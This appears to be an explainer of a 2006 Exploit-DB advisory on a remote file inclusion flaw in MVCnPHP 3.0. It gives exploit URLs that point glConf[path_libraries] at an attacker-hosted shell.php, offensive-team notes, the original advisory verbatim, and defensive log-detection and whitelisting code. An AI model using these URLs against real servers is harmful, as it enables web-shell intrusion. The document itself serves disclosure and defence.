MVCnPHP 3.0 Remote File Inclusion Explained

What this paper is
This paper details a Remote File Inclusion (RFI) vulnerability in MVCnPHP version 3.0.0. RFI allows an attacker to trick a web application into including and executing code from a remote server, effectively allowing arbitrary code execution on the target.
Simple technical breakdown
The vulnerability lies in how the MVCnPHP application handles configuration settings, specifically the glConf[path_libraries] parameter. When this parameter is controlled by user input and not properly sanitized, an attacker can point it to a malicious PHP file hosted on their own server. The application then fetches and executes this remote file as if it were a local library, leading to code execution.
Complete code and payload walkthrough
The provided exploit paper does not contain any source code for the MVCnPHP application itself, nor does it provide specific shellcode or payload bytes. It only lists the affected files and the exploit syntax.
Affected Files:
- BaseCommand.php
- BaseLoader.php
- BaseView.php
Exploit Syntax:
http://server/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php
Explanation of the Exploit Syntax:
- http://server/dir_mvcnphp/: The base URL of the vulnerable MVCnPHP application on the target server.
- BaseCommand.php, BaseLoader.php, BaseView.php: The specific PHP files within the MVCnPHP application that are vulnerable.
- ?: Marks the start of the query string parameters.
- glConf[path_libraries]=: The vulnerable parameter. The application likely uses it to configure the path from which it loads libraries.
- http://evalsite.com/shell.php: The attacker-controlled URL pointing to a malicious PHP file (e.g., a web shell) hosted on the attacker's server (evalsite.com).
Mapping:
- glConf[path_libraries] parameter -> Practical Purpose: User-controlled input that dictates where the application loads its libraries from.
- http://evalsite.com/shell.php -> Practical Purpose: The remote file containing malicious code (e.g., a web shell) that the attacker wants to execute on the target server.
Unknowns:
- The exact code within BaseCommand.php, BaseLoader.php, and BaseView.php that leads to the RFI is not provided.
- The content of shell.php is not provided, but it is assumed to be a standard PHP web shell for arbitrary command execution.
Practical details for offensive operations teams
- Required Access Level: Unauthenticated access to the web application. The vulnerability is exposed via GET parameters in the URL.
- Lab Preconditions:
  - A target web server running MVCnPHP version 3.0.0.
  - A separate attacker-controlled server (e.g., a VPS or a local web server) capable of serving PHP files. This server hosts the malicious shell.php.
  - The attacker's server must be accessible from the target server over HTTP/HTTPS.
- Tooling Assumptions:
  - A web browser for crafting and sending requests.
  - A web server (e.g., Apache, Nginx) on the attacker's machine to host the payload.
  - A text editor to create the shell.php file.
  - Tools like curl or Burp Suite can be used for more advanced testing and automation.
- Execution Pitfalls:
  - Firewall/Network Restrictions: The target server might have outbound firewall rules preventing it from connecting to the attacker's server.
  - Input Validation/Sanitization: Later versions of MVCnPHP or other security measures (like WAFs) might have patched this vulnerability or implemented checks that prevent the RFI.
  - PHP Configuration (allow_url_fopen): The target server's PHP configuration must have allow_url_fopen enabled for RFI to work. If it is disabled, the vulnerability becomes a Local File Inclusion (LFI) if file paths can still be controlled.
  - Payload Hosting: The attacker's server must be stable and accessible.
  - File Extension: The target application might be configured to only include files with specific extensions (e.g., .php). If the attacker's payload is not a .php file, it might not be executed.
- Telemetry:
  - Network Logs: Outbound HTTP/HTTPS requests from the target server to the attacker's server.
  - Web Server Logs (Target): Access logs showing requests to BaseCommand.php, BaseLoader.php, or BaseView.php with the glConf[path_libraries] parameter. Error logs might indicate issues with fetching remote files.
  - Web Server Logs (Attacker): Access logs showing requests from the target server for shell.php.
  - Application Logs (Target): If the application logs include details about loaded libraries or configuration, these might show the remote path being used.
  - Process Execution (Target): If shell.php executes commands, evidence of new processes being spawned by the web server user.
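As an added example (not part of the advisory or of this page), the following Python script applies the target-side web server log indicator above to Apache-style access-log lines: it flags requests to the three affected scripts whose glConf[path_libraries] value carries a remote URL scheme, including percent-encoded and mixed-case variants. The log lines and client addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts named in the advisory and the parameter the exploit abuses.
AFFECTED_FILES = {"BaseCommand.php", "BaseLoader.php", "BaseView.php"}
VULN_PARAM = "glConf[path_libraries]"
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")

# Apache/Nginx common or combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def detect_rfi(line):
    """Return a finding for one access-log line, or None if it is not an RFI
    attempt against an affected MVCnPHP script."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    script = parts.path.rsplit("/", 1)[-1]
    if script not in AFFECTED_FILES:
        return None
    # parse_qsl percent-decodes keys and values, so glConf%5Bpath_libraries%5D
    # is matched too; lower() catches mixed-case schemes such as HTTP://.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == VULN_PARAM and value.lower().startswith(REMOTE_SCHEMES):
            return {"ip": m.group("ip"), "ts": m.group("ts"), "file": script,
                    "remote": value, "status": m.group("status")}
    return None

def scan(lines):
    """Run detect_rfi over an iterable of log lines and keep the hits."""
    return [f for f in map(detect_rfi, lines) if f]

# Constructed sample log (not real traffic): two hits, one benign local path,
# and one request to a script the advisory does not list.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2006:12:00:01 +0000] "GET /dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php HTTP/1.1" 200 512
203.0.113.5 - - [10/Aug/2006:12:00:02 +0000] "GET /dir_mvcnphp/BaseLoader.php?glConf%5Bpath_libraries%5D=HTTP://evalsite.com/shell.php HTTP/1.1" 200 512
198.51.100.7 - - [10/Aug/2006:12:01:00 +0000] "GET /dir_mvcnphp/BaseView.php?glConf[path_libraries]=libraries/ HTTP/1.1" 200 100
198.51.100.7 - - [10/Aug/2006:12:01:01 +0000] "GET /index.php?glConf[path_libraries]=http://evalsite.com/shell.php HTTP/1.1" 404 0
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```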
Where this was used and when
- Context: This vulnerability was found in the MVCnPHP web application framework.
- Approximate Year/Date: Published on 2006-08-10. This indicates the vulnerability was likely present and exploitable around that time. Such vulnerabilities in older, unpatched web applications can persist for years.
Defensive lessons for modern teams
- Input Validation is Crucial: Always validate and sanitize user-supplied input, especially when it's used in file paths, configuration settings, or database queries.
- Disable allow_url_fopen and allow_url_include: For most web applications, these PHP directives should be disabled in php.ini to prevent RFI vulnerabilities. If remote file inclusion is absolutely necessary, it should be implemented with extreme caution and strict controls.
- Use Whitelisting: Instead of blacklisting potentially harmful characters or patterns, maintain a whitelist of allowed values for configuration parameters like library paths.
- Regular Patching and Updates: Keep all web application frameworks and their dependencies updated to the latest secure versions.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts.
- Secure Configuration: Review and harden server and application configurations to minimize attack surfaces.
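The whitelisting lesson above, modelled in Python as an added example (not code from MVCnPHP or from this page): a resolver that maps a requested path_libraries value onto one of a fixed set of library directories and rejects the RFI vector (any URL scheme or stream wrapper) as well as the LFI fallback the text mentions (absolute paths, null bytes and traversal out of the allowed directories). The application root and the allowed directory names are assumed values; the same checks would be implemented in the PHP application itself.

```python
import posixpath
import re

# Constructed layout for this example: the application root and the only
# directories beneath it from which libraries may be loaded.
APP_ROOT = "/var/www/mvcnphp"
ALLOWED_LIBRARY_DIRS = ("libraries", "vendor")

# RFC 3986 scheme syntax: "http:", "HTTPS:", "php:", "data:", "ftp:" ...
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")

def resolve_library_path(requested, app_root=APP_ROOT, allowed=ALLOWED_LIBRARY_DIRS):
    """Map a requested path_libraries value onto a whitelisted directory.

    Returns the normalised absolute path, or None when the value must be
    rejected: any scheme prefix (the RFI vector, including php:// and data://
    stream wrappers), embedded null bytes, absolute paths, or traversal that
    escapes the allowed directories (the LFI variant once allow_url_fopen is off).
    """
    if not requested or "\x00" in requested:
        return None
    # "http://evalsite.com/shell.php" matches here; a plain relative path does not.
    if SCHEME_RE.match(requested):
        return None
    if posixpath.isabs(requested):       # also rejects "//evalsite.com/shell.php"
        return None
    # normpath collapses "." and ".." textually, without touching the filesystem.
    candidate = posixpath.normpath(posixpath.join(app_root, requested))
    for name in allowed:
        base = posixpath.normpath(posixpath.join(app_root, name))
        # Compare with a trailing "/" so "librariesX" does not pass as "libraries".
        if candidate == base or candidate.startswith(base + "/"):
            return candidate
    return None
```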
ASCII visual (if applicable)
+------------------+      +---------------------+      +----------------------+
| Attacker Server  |----->| Target Web Server   |----->| MVCnPHP Application  |
| (e.g., evalsite) |      | (e.g., server)      |      | (e.g., MVCnPHP 3.0)  |
| +--------------+ |      | +-----------------+ |      | +------------------+ |
| | shell.php    | |      | | Apache/Nginx    | |      | | BaseCommand.php  | |
| +--------------+ |      | +-----------------+ |      | | BaseLoader.php   | |
+------------------+      +---------------------+      | | BaseView.php     | |
        ^                                              | +------------------+ |
        |                                              +----------------------+
        |                     (fetches shell.php)                 |
        +---------------------------------------------------------+
(Exploit URL: http://server/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php)

Explanation of Diagram:
- The Attacker Server hosts the malicious shell.php file.
- The Target Web Server receives the exploit request.
- The MVCnPHP Application running on the target server processes the request.
- The application, due to the vulnerability, makes an outbound HTTP request to the Attacker Server to fetch shell.php.
- The fetched shell.php is then executed by the PHP interpreter on the Target Web Server, leading to code execution.
Source references
- Paper ID: 2173
- Paper Title: MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion
- Author: Drago84
- Published: 2006-08-10
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2173
- Raw URL: https://www.exploit-db.com/raw/2173
Original Exploit-DB Content (Verbatim)
MVCnPHP Remote File Inclusion
############ToXiC CrEw###############
Bug Found by Drago84
Page Sources:
http://freshmeat.net/redir/mvcnphp/46123/url_tgz/Geeklog_MVCnPHP-3.0.0.tgz
Page Affect:
BaseCommand.php
BaseLoader.php
BaseView.php
ExP:
http://server/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php
# milw0rm.com [2006-08-10]